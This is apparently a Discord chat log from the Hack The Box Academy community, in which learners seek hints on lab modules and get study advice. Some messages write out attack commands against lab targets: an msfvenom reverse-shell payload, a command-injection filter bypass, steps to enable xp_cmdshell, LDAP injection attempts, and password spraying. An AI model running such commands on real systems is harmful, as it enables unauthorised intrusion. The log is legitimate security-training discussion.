either way: have fun getting caught

you wanna break the law and face a judge be my guest

All Right!

I found it, 😭 I'm going to sleep

please can you tell me how i work html with csss?

Stupid Question, I have the Silver membership so I have access to all Level 1 and Level 2 modules. If I unlocked with cubes I would get permanent access to refer back to modules, how does that work with memberships, do I lose all access if I dont renew annually to previously completed modules?

once you have finished the modules they're permanently yours

Thank you

especally i prepare login page with css?

modules that need good internet should be optimize lol

i watsed a lot of time for these

F*() around and fine out, you are going to be praying for capitalism if you get shipped off to jail for doing something stupid

People be taking jokes too seriously

I talked about the whole privEsc thing humorously

And people be acting like cyber police or something 🤣

i learn new web.im new platform

Start with "Getting Started" module

how slearn strongly web developer or cyber securyti

where getting start on web cite? this is on discord?

thanks u so much

On the site. Search up "Getting Started" on the seqrch option of HTB site

No problem, mate

thanks a lot,mate

https://academy.hackthebox.com

thanks a lot MarcieLee

hi guys, having some difficulties on Premature Session Population (Auth Bypass) from the Abusing HTTP Misconfigurations module .i tried following the steps but still unable to bypass it. would appreciate any help. thanks

no, read #rules or fuck off

oh mybad does that break the rules?

first general thing you should do when joining a discord is read the #welcome channel and the #rules

yo stop fucking cursing at me

✨ no ✨

ight then

either way if you're not here to learn; then you can leave: as this server is for a website called Hack The Box, this channel in particular is related to HTB academy a learning centered platform

Where can i start?

well if your motivation is just to do some simple phishing to get Roblox creds: then no - you can google hacking beginner's bible though to get a rough idea of how to start

i just lost my password but what about the other things?

? @fathom pendant

Let's be nice to newcomers, shall we?

thats what im saying fr

if you lost your password; then email roblox support my dude

when a lot of newcomers come in here asking how to hack xyz

ok but i want to learn about other things too i just dont know where to start

you get jaded to these types of queries

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ok I will look at it

That's because they are newcomers 🙂

except they don't wanna learn how to hack, they just wanna get some petty revenge on someone

in which case they can learn from google ¯_(ツ)_/¯

I actually do though

not the revenge part

People like them should learn the consequences the hard way, that is by getting sued for hacking

What is the point of behaving rudely, mate?

And I don't think this new guy is asking for revenge

it's the way I interpret the request ¯_(ツ)_/¯

because again, i've been in the server long enough to see a bunch of different people

90% of people that are asking stuff like "How do I get someone's password from xyz" are often not asking for legality

how are my notes for the NFS section of footprinting module?

I'm gonna revise them tomorrow

idk what file format odt is

ok let me convert it to docx

i also don't feel like downloading

the only person to attest to the quality of your notes is yourself

my guy, no one is gonna download random files online lol

can you say that you can do that section from your notes, without needing to reread the section for clarity

upload it to google drive and share the link

there now you should be able to open with word

https://libguides.reading.ac.uk/reading/notemaking

good note taking is hard to learn at first

i'm not downloading this

ok I will make google drive link

I use chatgpt to compile random resources in a concise format

saves a lot of time

the best notes come from you rewriting info in your own words

actually I will just read the note writing thing

also rewriting helps retain info

ok ya

You are right but sometimes when you don't have much time and need to learn a lot of different topics, compiling your notes this way certainly helps

i'd suggest rewriting what chatGPT spits at you

and make sure it makes sense; as chatGPT can be wrong/hallucinate

Also I have something called "perfection anxiety". When I write my own notes, it feels like they are not "perfect". Maybe there is a mistake here or there. Maybe I will get the wrong idea when I read them afterwards

But I guess they should be better than a beginner note-taker

if your notes make sense to you: that's all that's important

there's no such thing as a perfect note, accept that they're always subject to change based on your needs

if you can relate what you're learning to something you already know: it helps so much better

Right, but I am really anxious and I can't help it

I guess I need to work on my mindset too

i.e. DNS is like a phone switch - it knows where everything should go, and if it doesn't it needs to be routed/find the right route

public DNS is like a global phonebook, where something like /etc/hosts is a local; where it may have your local community's phone number

Yeah, Informal and simple language is better to understand

I will remember that while making notes from next time

ye; break it down as if you're a dum dum that doesn't know what fancy words mean

it's how I try and break down concepts when I assist people with modules- especially when it comes to language barriers

but that's also how my mind works; i have to boil things down to their simplicity to understand it

Can I say that load balancers are just like middlemen who are balancing web traffic among servers?

Currently revising the topic

as long as it makes sense to you

and you can really say, if someone asks, "well if you look at it this way, you can see that blahblahblah"

my notes use a lot of IT support shorthand

if the word "Customer" is important to the phrase i'm rewriting, i'll use Cx

That makes the notetaking process faster

But the problem is remembering all those shorthands

but I also have an IT support background

which is why I can use the shorthands

I see

What is your current working field?

none atm

looking at apprenticeship opportunities in my state for Cyber related stuff

if you're in the US. you can use findhelp.org to look for local resources

Like a trainer or coach?

sort of; it's a paid learning opportunity

some of them are several years

you learn stuff and get paid :)

That's really helpful for many people, since there are a lot of resources out there but where most face problem is learning to use them in the proper way and order

Learn and get paid?

ye it's a job

That's a win-win thing

like any trade apprenticeship

Man, wish I was in the States

some companies allow you to apply from overseas, but might require you to move to the states to do work ¯_(ツ)_/¯

Leaving home for a foreign land is a lot of work

I'm currently trying the Command Injections module, specifically the 'Bypassing Other Blacklisted Characters' section.
Intending to make sure I really understand it, so attempting to bypass a command filter (whoami currently) with a backslash. (ik can do it other ways, but want to use a backslash this time)

Backslash is a blocked character, so trying to use shifting to get it (as I couldn't find backslashes in any env vars that I could yoink).

tr '!-}' '"-~' <<< [```
Above is the shifting command the module gives, which includes a single double quote which it doesn't seem to like, so instead of shifting by 1, I'm shifting by 3 (2 uses | which is also blocked).
```bash
tr '!-{' '$-~'<<<Y```
Adding the ${IFS}s to avoid spaces (also blocked) gives
```bash
tr${IFS}'!-{'${IFS}'$-~'<<<Y```
Wrapping that in my command gives me 
```bash
whoam$(tr${IFS}'!-{'${IFS}'$-~'<<<Y)i

Which outputs whoam\i. Is there any bash syntax that I could wrap this in that would evaluate the backslash on the command line?
Thanks :)
(not sure if spoilers count in #modules but will delete/edit if needed 🫡 )

well backslash is an escape character

but it looks like it still should interpret the commmand

but it looks like it's injecting the character in as a non-escaped character

would that be a problem with something I've already done (eg use of $(cmd)), or something I haven't done yet (eg wrapping the whole thing in some sort of quote/bracket)?

@fathom pendant Took your advice. I am using chatgpt to have a look at my own written notes and see if there is a gap or mistake in my understanding

Hope it will be better than just copy pasting chatgpt's compiled notes

i haven't done this module just telling you how i'm interpretting what the bash error is ¯_(ツ)_/¯

you're good, thanks

yeah it looks like that syntax specifically injects the non-escaped character

id expect it to output the cmd output of whoami but is currently outputting

yes

but type whoam\i itself in the terminal

this actually works in zsh

huh. neat

oh wild

but yeah from experience these kind of wacky command injection usually doesn't work very well, there's too much variant between where you're trying to inject and the system interpreting it, often it works in your terminal but doesn't work when you try it

mm yeah

its annoying cause the module baited me and was like 'haha if you wanna tryhard try and do it with the backslash'

terrible

yeah you can do a single backslash and it works

yeah, i was trying to simulate the escaped backslash in my larger statement, but might be a lost cause

ty for the help though:))

(it could also be your injection is injecting a double backslash)

like two backslash characters?

ye

at least that's what I'm thinking is the case

I'd be very interested if it was, from my understanding the tr command shifts whatever it gets from stdin, so if I only put in one character (the Y), I should only get one char out

it's one of those quirky things with it ¯_(ツ)_/¯

love technology

it could be treating the inject as a '\'

like a literal backslash, not escape

Will learning to make my own script help in exploiting these vulnerabilities like SQli, XSS or Command Injection?

mm, thats what I was referring to as an escaped backslash

im of the opinion that if you can code something you truly understand the concept, so I'd say yes

eh you won't really ever need to make your own code tbqh

there's already tools that do it for you :D

(but knowing how they work is important)

are traditional tools like sqlmap and burpsuite enough for all hacking tasks?

which is what I appreciate about HTB modules, they slap you with the hard one, then show you "btw this tool existed - the WHOLE time"

no

you'd need to know about stuff for NoSQLi

(businesses not using SQL as a database)

Doesn't this vulnerability have its own toolset?

kinda

but again there's underlying concepts for those :D

Say I learn all the concepts and test using both traditional automated tools and manually

will the process makeup for not learning to script myself?

yep

tools just make your life easier

Thanks, mate. I thought you were a little bit rude at first but you are really a helpful person.

again; it's mostly just being jaded from seeing on a weekly basis at least 20 people coming in being like "i need help to hack xyz, they are bad person" like dude, just go to the authorities

It's okay. I know it gets annoying at times to see people ask for the same thing over and over again

they use excel instead

sticky note on the desktop

i mean tbh that's safer from an outside perspective, but if the threat is already inside the office lmao git rekt

oh yeah i meant the digital desktop, but yeah just a bro rocking up and seeing all these passwords taped to the monitors 💀

physical pentesting 📈 📈

ah yeah forgot windows had that stickynote feature

i unironically used that for a bit

just for notetaking or something?

to do list

ye; when I did IT stuff; just common checklist stuff

in password attack module, bruteforcing took ages for me, since i'm in SEA, i even try use pwnbox USWest server with 2, 3 ms, still a bit long, any suggestions :((

increase number of threads for hydra, and avoid bruting ssh if you can

pwnbox has other servers internationally

btw

iirc there is an AU one

there's pwnbox server for au and sg, but no academy servers

yeah i chose pwnbox server that close to academy server

eh if you want smoothness with the pwnbox i'd say using the one closer to you is better

they might eventually release edge servers for academy vpn in those regions, the pwnbox release was likely a test release

i mean the delay from pwnbox doesn't matter that much, i want to optimize the time for bruteforcing actually

¯_(ツ)_/¯

i've found that most people have luck using 48 threads with hydra

if it drops a bunch of agents; you'll need to adjust

how do I manage terminals, browsers and other GUI apps together? It gets really messy for me at times

For multi step encoding / decoding like in
https://academy.hackthebox.com/module/110/section/1052
Is there a good way to do multi step (decode a, pipe into, decode b) in Zap rather than cut and paste and then needing to iterate back to the beginning?

you're better off using something like cyberchef for those
https://gchq.github.io/CyberChef/

Thanks, yeah wasn't quite feeling the right tool.

Cheers! 🙂 First of all: I was just recommended HTB academy (I'm not from IT , but interested) and the last few days have been a BLAST, this is great!

I'm currently doing the "getting started" module which, too, has been really good (for a beginner). I just wanted to provide minimal feedback on the "Privilege Escalation" section of that module:

I do know that the intended solution is fairly straight forward and ba far easy enough. BUT if you read the text , you have MANY options to approach the problem with more or less no clue, which options should be tried (by a beginner) and which ones are rather... "not for now", so to say 😉 I spent hours trying to find out how to transfer scripts from my host to the remote machine, how to execute msfconsole on the remote system, how to download PEASS to the remote machine (--> DNS resolution for github throwing an error) , etc. Then I went on and found the webserver on the target machine, but could not access (no rights, which is very fine). Then I went on and tried to run searchsploit on my local machine with the linux-version of the target. this DID uncover public exploits, but I had no clue how to run them on the remote machine 😄 this goes on about cronjobs, etc ^^

I'm not saying any of this is bad, it was a nice hunt, BUT, in comparison to the other interactive sections I've done so far, this was more confusing as the "simple intended approach" was among the latter in the text. Dont get me wrong: having to try several new appraoches to get used to them is awesome, but in this case I never knew whether any of what I'm doing is stupid^^. Still, I learned quite a lot, it is great 🙂 Maybe siply re-ordering the exploit approach in the text a bit might safe the next beginner from a lot of likely unintended headache 😄

Write a TL;DR too

Hello, and welcome! Getting Started module has a really nice section covered before the PrivEsc one called "Transferring Files". I don't remember 100% how the PrivEsc there goes, but for example you can probably transfer linpeas with the wget method mentioned in the module

hey there 🙂 yes, it's the section RIGHT AFTER the one I was talking about 😄 ... which, in hindsight, could have been a clue as to NOT try this path. But thanks! I was really just trying to share my awesome experience and the minor bump in it 😉

Oh, it is. That is pretty weird indeed how the section is covered right after 😄 Good feedback ^^

Great to hear that it didn't discourage you though. The modules are generally great at explaining things. Are you on a specific path, or are you just doing Getting Started for now?

In theory, I fully get how one can see the current structure as logical. Yet, parts of the "privilege escalation" chapter require some file-transfers (IF they would be required in the interactive part), which is only addressed / introduced afterwards.

As for your question: I started with the "SOC Analyst"-path, but felt like a tiny bit too noob for that (really not by much, but I had to google more terms than felt correct) and then switched to the "getting started" path. This feels like the absolutely right decision. Even to a point where I felt like the "getting started" module should have been advertised more heavily for beginners after account creation 😄 It's really nice 🙂

generally you should try the low hanging fruits first before doing the more complicated exploits. if you're new to this field, I'd recommend to start with the Information Security Foundations path

That one is already bookmarked as "to-do next" for me, yes! 🙂 "getting started" simply sounded EVEN MORE beginner-ish (and much shorter). About "starting with low-hanging fruits": yes, absolutely. But in the context of the "Privilege escalation"-section, I simply did not know which approach would be low-hanging (but I guess all my detours made me feel like "this is not the right way" simply because it felt too difficult). I usually simply follow the text-examples step by step, try to understand them and then get the flags 🙂 in this section, this approach caused (minor!) problems on my end^^.

And thanks! 🙂

Hello there, anyone could give a hand with Injection Attacks Skill assessment, I have been identify the PDF exploit but can't find the internal web app, thanks an advance

Hello need help on Attacking Thick Client Applications please. I'm following the instructions in the x64dbg to try to find in the Restart-OracleService.exe the Type MAP with protection RW but nothing appears..

Have a look at the configuration files of the web server.

Can you tell me the file name? I've looked through everything, I found only ip 192.168..... in hosts. I tried different ports, nothing helps.

|| ports.conf||

you can refer to walkthroughs of PivotAPi

Thank you, I saw these two ports, and I tried them on two ip.

I realised what my mistake was!!! Thank you. I'm on my way.!!

God damm... Many thanks for this

Anyone have any idea of this is arp poisening:

of how*

Hello! i got a little stucked at Active Directory Enumeration & Attacks part 2.
The current question is "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. " And i have the connection string from the last question. I am trying to connect to the SQL01 host with mssqlclient. Doestn really work. Can anyone give me an idea whats wrong? Maybe the username is not correct?

are you sure that's the right user?

not really, i was trying DC01 as username as well as mssqlsvc

check the file where you found the connection string

yeah it said computername environment variable

it was from DC01

thats the computername

at least the hostname

read it carefully, the username is inside

there you go 😄 thank you

you are always a big help in my progress ❤️

why cant I run iconfig ?
it says command not found ?

how do i install it ?

Try ipconfig

same result

Are you using windows

no MAC

Parrot hack the box version

Try ifconfig

worked , thanks!

Welcome

Does anyone have an idea on how this is arp poisoning and perhaps could explain it?

Hey I'm on Attacking Common Applications, "Attacking LDAP"
trying LDAP injection

For example, suppose an application uses the following LDAP query to authenticate users:
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

if an attacker injects the * character into the $password field, the LDAP query would match any user account with any password that contains the injected string. This would allow the attacker to gain access to the application with any username,

is this the right approach to inject $password = " * "; ?

||ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "($password = " * ";)"||

google

I do know how arp poisoning works, I just can't seem to understand how this is arp poisoning.

why is that not arp poisoning

if you're using ldapsearch then password is specified with -w

After an eternity of trial and error i did it on the attackbox, but on my own VM i couldnt even capture the hash xD

What is the new certification 'CWEE' that is coming soon?

https://academy.hackthebox.com/path/preview/senior-web-penetration-tester

Oh nice, that path looks awesome

Who now about project AI AGI

Module : Windows Priv Esc
Section: Dns Admins
My problem is the connection, always going down xfreerdp so i do the section says and im in the dns admins groups but cant read a flag anyboyd help ?

damn 😂 at least u did it

Anyone able to give me a pointer real quick ? " Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on"
ive ran multiple scans but still cant get that telnet service to pop up

check the errors that are displayed.
The files do not seem to exist

Hi guys!, im just getting to the platform and i not getting through the Linux Fundamentals ❤️ the ssh login. Im kind of lost with the VPN and the ssh, if a have to do it in the terminal, in a virtual machine. I dont have more instances btw. Anyone can help this noob?

reset wait 5 mins and try again

If you don't have more instances you'd probably have to (use a VM)

Aaa okay thanks man

In module: PIVOTING, TUNNELING, AND PORT FORWARDING, skills assesment. What am I missing? I created windows payload with msfvenom msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.15 -f exe -o backupscript.exe LPORT=8080 and used internal ip of pivot host. Then I transferred it to windows machine. After that I setup metasploit multi/handler.

payload => windows/x64/meterpreter/reverse_https
lhost => 0.0.0.0
lport => 8000

Then I started remote forward from ssh. ssh -R 172.16.5.15:8080:0.0.0.0:8000 webadmin@$IP -vN -i id_rsa
And when I run that payload in windows machine I dont get meterpreter session.

The message was probably too long.
Read and follow #welcome to solve the problem

Yoo are you a bot

Sure, beep boop 🤖

Lol bro you funny af

Take some rest 😂

smbclient not wanting to connect to the host to list any shares, im using the correct syntax for smbclient right ?

“host unreachable” is the machine currently active?

i noticed that too, but yes it is, just refreshed my pwnbox vm and attacker machine 5 min ago . i keep gettingthese responses

*target machine

are you connected to the internet?

🤓👆

lolof course

strange

what module is that?

part of the CPTS path i believe, Getting Starte- Service Scanning

im going to simply restart my laptop lmfao

Module: Pass the Hash
Issue: I did all of the questions last night but left the bonus one for today - I've tried resetting the machine, regenearting VPN config file, giving the machine some alone time before tackling it. I can't get it to run mimikatz / any other command which would fetch me the user hashes. I've tried evilwinrm / impacket / reverse shells without luck. this is the closest I've come to in the past 20min of trouble shooting. There's no output to commands. I'm unsure how to get around this issue.

The question for referene: Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happen if you use evil-winrm?. Mark DONE when finish.

In the Windows Privilege Escalation Module, in the sections Windows Desktop Versions (https://academy.hackthebox.com/module/67/section/913) and Windows Server(https://academy.hackthebox.com/module/67/section/912) they given an example of an exploit then in the evaluation section they instruct you to use the exploit to get the flag on the Administrators desktop. They also tell you to try other exploits to get system access? What are some exploits other than the given examples that guys have had success with in the sections Windows Desktop Verions and Windows Server.

Module: AD Enumeration & Attacks - Skills Assessment Part II Q. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I tried everyting I know basically. Last thing I did was to try Reverse shell through xp_cmdshell but that not working... what am I missing?

Thanks!

Module: Introduction to networking
Section: Wireless Networks

There are two things which bothered me a little bit. While overall the course is really nice, it says that following things can be modified to improve WiFi security:

• disable SSID broadcasting
• enable MAC filtering

However, there is nothing about disabling WPS - which I think should be also done - isn't this still relevant?

I am not entirely convinced that disabling SSID broadcasting and enabling MAC filtering should be advertised. Or maybe my understanding is wrong - and we should always do that in case someone somehow gets our wifi password, but will not have enough knowledge to change his MAC address in order to gain access to the network.

What are your thoughts?

hi everyone, can someone help me in last step of attacking common services lab hard?

|| I have already impersonated john user and execute the commands to activate cmd on remote server||

|| but I cant retrieve the flag due to syntax error||

|| EXECUTE('SELECT * FROM OPENROWSET(BULK N"C:/Users/Administrator/Desktop/flag.txt", SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV] ||

|| [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: Incorrect syntax near 'N'. ||

Hacker

also tried this

|| EXECUTE('xp_cmdshell "whoami"') AT [LOCAL.TEST.LINKED.SRV]||

[-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

@native turtle You have to enable usage of xp_cmdshell first

I did

on remote

How do I find persistent registry keys in Velociraptor?

Then you should not be getting that error and you can type commands as NT\Authority

idk

|| EXECUTE('sp_configure "show advanced options", 1') AT [LOCAL.TEST.LINKED.SRV]||

I did this and the other

with the correct response output

but then when I try to execute xp_cmd on remote server it dumps the error

@native turtle Did you run all these commands? ```-- To allow advanced options to be changed.
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.
RECONFIGURE
GO

-- To enable the feature.
EXECUTE sp_configure 'xp_cmdshell', 1
GO

-- To update the currently configured value for this feature.
RECONFIGURE
GO```

In the remote server

yes

😦

Did you get any errors while running those?

and check users in the remote server

I figured out

I dont know why I was using

EXECUTE('sp_configure "Ole Automation Procedures", 1') AT [LOCAL.TEST.LINKED.SRV]

and not xp_cmdshell

iirc you still need to alias

but it's been a minute

Hi folks, i'm trying to get the flag In the Privileged Access section of the AD Module, however using PowerUp SQL I get no output. Any pointer ?

PS C:\tools> Invoke-SQLOSCmd -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "XXXX!" -Command "type C:\Users\damundsen\Desktop\flag.txt"
VERBOSE: Creating runspace pool and session states
VERBOSE: Closing the runspace pool

I used impacket mssqlclient.py in the end but still curious

I think you have to supply sql commands to it

I checked here for example, seems pretty simlar to what I did
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/abusing-ad-mssql#mssql-rce

¯_(ツ)_/¯

invoke-sqloscmd doesnt auto enable xp_cmdshell it seems

basically, powershell function is too old to be useful to modern targets

hacktricks seems to say it checks and enable if needed, also when using impacket, seems it was on by default

SQL> enable_xp_cmdshell
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Maybe that's the issue then 🙂

is hackthebox down

cademy

can access it without issues

Working for me

trying to enumerate vHosts on info gathering - web edition ... can't seem to get anything... So far I've tried using different variations of ||ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u <ip> -H "HOST: FUZZ.inlanefreight.htb"|| and I haven't had anything short of thousands of errors... Am I on the right track? A nudge or hint would be nice

Here's the syntax i used for similar purpose. Note the FUZZ bariable.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://topology.htb/ -H "Host: FUZZ.topology.htb" -fw 1612

Wrong person

also, the -fw is to filter results based on various criterias. Essentially you want to get the answer that is different from the failing ones by filtering result

anyone know why I cant carckmapexec password attacks └─$ sudo crackmapexec smb 10.129.41.174 -u usernames.txt -p /usr/share/wordlists/fasttrack.txt
SMB 10.129.41.174 445 ILF-DC01 [*] Windows 10.0 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local) (signing:True) (SMBv1:False)
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/impacket/smbconnection.py", line 278, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3.py", line 1040, in login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

During handling of the above exception, another exception occurred:

ValueError: too many values to unpack (expected 2)

sorry, it was for @grizzled schooner 😮

lmfao

Attacking Active Directory & NTDS.dit

any particular reason you used subdomains-top1million...... instead of namelist.txt? It's what they had had in the module so I thought it would be based off of that

I'll give the other wordlists a try though

thanks

Not sure what is in namelist, but the subdomain + domain would make a valid HTTP Host 🙂

Also, mind :FUZZ the wordlist.txt:FUZZ

Im doubtful. a different link gave a warning about the command that xp_cmdshell not being default enabled. Hacktricks often just steals content from random other places and doesnt verify. Id use them for quick attempts, but I don't trust it implicitly to be right.

can't say it's mandatory but that's how I did 😄

They've even stolen academy content

yeah for sure, thanks... I'll look into those

Probably some incompatiblity with python libs. Try netexec tool instead

what does netexec do

It's the updated fork of crack map exec

It's the same tool

but CME is not maintained anymore and I had a few conflicts with python libs due to it

i c ok thanks

the original author wanted to start selling new cme updates first, but the actual devs making the updates wanted to keep it pure open source so they left and started netexec. So its literally the same tool/code except thats where all nee updates and fixes are going. They just changed the name because the other guy got pissy

bmi, I'm still having some troubles, I noticed that the module says you need vHost www.inlanefreight.htb so I edited the syntax to be ||"ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt:FUZZ -u https://10.129.58.110 -H "HOST: FUZZ.www.inlanefreight.htb" -fw 2000 -fs 2000"|| as well as the list you used... I've ran this a couple different ways it seems and I'm only getting errors.. do I need to add the ip to /etc/hosts?

Why are you fuzzing a.www.inlanefreight.htb

(The www is to give you an idea of a positive hit)

FUZZ.inlanefreight.htb

so my thought process was, if they're telling me that I need vHost www.inlanefreight.htb, maybe it wanted xxx.www...... so I wasn't sure

Incorrect thought process

good to know

www.inlanefreight.htb is one of the vhosts

I did that before, and I'm getting nothing but errors, so I tried expanding the -fs and -fw as well... but only errors

I run without fs and fw at first to see whats the trash

what error you get ?

doesn't give me an error message, just shows "Errors: the number of items in whatever text file I've used"

Why do you use https

Not http

?

when sharing errors do not paraphrase them

Also screenshots are a thing

yes you need to add the ip

are you getting errors like

agirenconscience        [Status: 403, Size: 151, Words: 3, Lines: 8, Duration: 8ms]
agirklmext              [Status: 403, Size: 151, Words: 3, Lines: 8, Duration: 8ms]
agirpourlatransition    [Status: 403, Size: 151, Words: 3, Lines: 8, Duration: 8ms]
``` ?

isn't that what -u is in this case?

Hi can someone give me a hint in the advanced sql injection skill assesmente? I manage to find the sql injection and dump the email, but something is blocking me from dumping the password

Oh why are you using https

Most academy targets will be http

Only time ised https was nessus iirc

... well, that changed everything

Because nessus uses https

Yea

for real, I didn't even realize

Because you didn't bother reading your own command

mb

It happens

does nxec STATUS_LOGON_FAILURE does this mean the password is wrong or the port messed up something

You'd only get a logon failure if the user/pw combo fails

i c ok so it is working danke

could I export the results of a ffuf containing word count and everything to a text file ?

ffuf should have an output flag

If not bash redirects will do

yeah I'm just running into text editor saying that the file was too long LOL

Lol

That means you should probably start filtering before moving forward

yeah I tried to filter by using | grep words: 3 (and moved the number up, but bash isn't saving the entire output when it runs so I don't think it's working right

Yes -o

I think default is json nor sure rn

Has anyone here ever successfully used sudo with openssl to get a reverse shell?
While file reading and writing work well, I've never been able to use the GTFObins trick to get an elevated shell.
Reference: https://gtfobins.github.io/gtfobins/openssl/#sudo

Ffuf has built in filtering

What module is this in reference to, this doesn't sound academy related

Read #welcome to find out how to access more of the server

Careful with revealing stuff for Attacking Enterprise, as most do it blind

Thats why I marked it as Spoiler

Ill get rid of it, thatd be better

I haven't done this module so I can't help you

Oh, sorry. Hope you didnt read the spoiler marked stuff

Upload linpeas and see what that might lead you to

have everything but the specific vHost that starts with "d" I figured it would've been ||dev-admin.inlanefreight.htb|| but it isn't... am I missing something lol... I ran through the top1million-5000 and sorted by the amount of words (the previous 4 answers had 3 words) and nothing came up...

Maybe the word count is misleading

Perhaps size is the better way

you said that and I said ill filter size

lol

Like I said, they use www to give you an idea what to filter

-f[n] is a negative filter, -m[n] is a positive (match) filter

When using -fs it says you can comma separated list of sizes and ranges... so could I do -fs 90,110 to have it output sizes between that range?

Again -fs is a negative, meaning it will discard anything that matches it

so would -mn 90,110 make it match everything within that range?

[n] is just a substitute for whatever mode you're matching

yeah I meant to put s

Iirc you'd need to do 90-110, comma separation is saying a OR b

yeah that was it thanks, got my answer

I’m on an iPad atm and was wondering if i could do academy modules on it instead of a regular pc

Theoretically yes. You can use the PwnBox. But it is very limited and no fun

hello, i have an issue with the Game Reversing & Modding skill assessment, i passed the first step but when i have to let the game connect to remote instance, i see in BepInEx that Fixman cannot connect the instance (so i cant intercept in Burp) [Yes i'm connected to the vpn]

What is a good place to start with HTB Academy, I have the student subscription. I am getting lost in how much content there is

Is there maybe a wordlist provided on the academy page in ‚resources‘?

yeah I found it

Cool

if youre fundementals are weak do the InfoSec Fundementals pathway first.

Otherwise absent any other motivation, just follow the CPTS track

which one is the cpts track

and thank you

The certified pentester specialist is cpts

thank you

You need a paired keyboard

Can anyone help with the xpath blind exploitation module? I’ve been at this 3 days and the guide is unclear at a certain point. Not sure if it’s intended or not but not I’m just doing the same commands over and over

What is a step? Is it anything with a bold heading and the ensuing instructions or is it the command/query?

So far I’m following the guide and it doesn’t work as intended past a certain point.

Friends, good evening! Can anyone tell me about Supply Chain Attacks:Skills Assessment?
I found the gitlab host (credentials don't match)

hey i just finished the nmap network enumeration module. In the hard lab, why does ncat successfully connect to the port i'm trying to retrieve the flag from IF I use --source-port 53 but not --source-port 80 (an open port) or an unspecified source port

DNS proxying

you're making the request as if you're a DNS (port 53 is known as the DNS port)

so it treats it as if you're querying it from a normal method

Specifically Exfiltrating the number of child nodes. I don’t understand the wording when it talks about going to the previous step to target the node name I just exfiled

A step is whatever you did previously

Specifically Exfiltrating the number of child nodes. I don’t understand the wording when it talks about going to the previous step to target the node name I just exfiled

Yeah

hello it says in the section that it provides us with a list of words to list users but I can't find it :/ https://academy.hackthebox.com/module/112/section/1072

@marsh echo

Hahaha I’m already in the industry but some of the wording…bro wtf

aaH thanks a lot 😉

Yeah it’s like sometimes the writer is like “yeah go back to the thing” but what they want you to inject and the payload don’t matchup based on wording hahahahahha

Christ

This is wild I can read I promise and of course there’s no official write up so I just keep doing the module top to bottom@and get stuck at the same place

Where are the official admins?

I’m so angry hahahahah 4 days same module because someone wouldn’t add context

Please DM if you’ve done senior path xpath module.

I guess it’s because this module is new so not many have done it

Tbh it's likely just you misreading but I haven't done the path to be sure

Annual sub

Yes, that's what annual means

It’s possible @fathom pendant but I’ve gone to bed 3 times and still can’t read? Interesting

Can anyone give me a nudge on the file inclusion skill assessment? So far I have found a php filter to retrieve source code of local php files. I have examined the source code of all php files I have managed to fuzz and there isn't anything useful. Am I not enumerating enough?

Skill issue. But I'd recommend messaging website support if you feel like xontext is missing

I speak English

ChatGPT won't help in this case

Obvious it’s a skill issue that’s why I’m doing the module.

If I had the skill I wouldn’t do the module. I don’t understand what you wanted to get out of calling it a skill issue.

Post in erratum

Chill, it wasn't a personal dig at you

But seriously, messaging support/post in erratum

I suffer enough, thanks

Thanks I'm cured

Yes I did

I tried other wrappers but didn't have any success

And I tried the filter chain to get RCE which is definitely out of scope for the module

Alright thanks, been trying to get around the extension appending at the end but nothing yet

Nevermind, I'm dumb

when i run lasagne

it just deletes itself after it finds everything how to fix?

garfield probably ate it

https://tenor.com/view/garfield-belly-full-stuffed-hungry-gif-11113631645417084954

I don't understand why the commands don't work on the imap server :/ to find the admin email

https://academy.hackthebox.com/module/112/section/1073

You need to prefix imap commands

1 <command> <args>

If you search this channel you'll find a few imap articles regarding commands

ok thanks

Try resetting the target

i ressetting but nothing :/

my notes says you need to use A1 as a prefix

I connected with openssl s_client -connect 10.129.211.60:993

how did you find the prefix knowing that in the module it's 1?

it's been really long since I did that module, can't find the original article that I used for it but this should work
https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap

You can use any prefix afaik

Oh... did you log in?

hmm yeah that seems like the case

That's likely why it's failing if you're not logged in as a user

I thought there's a different error message if you aren't logged in

ok my bad 🙂

oh so you do need to use A1 for this

No

Their first command had user:password

Imap does user[space]password

right

Imap just requires any prefix

Afaik

yess I didn't notice :/

It happens

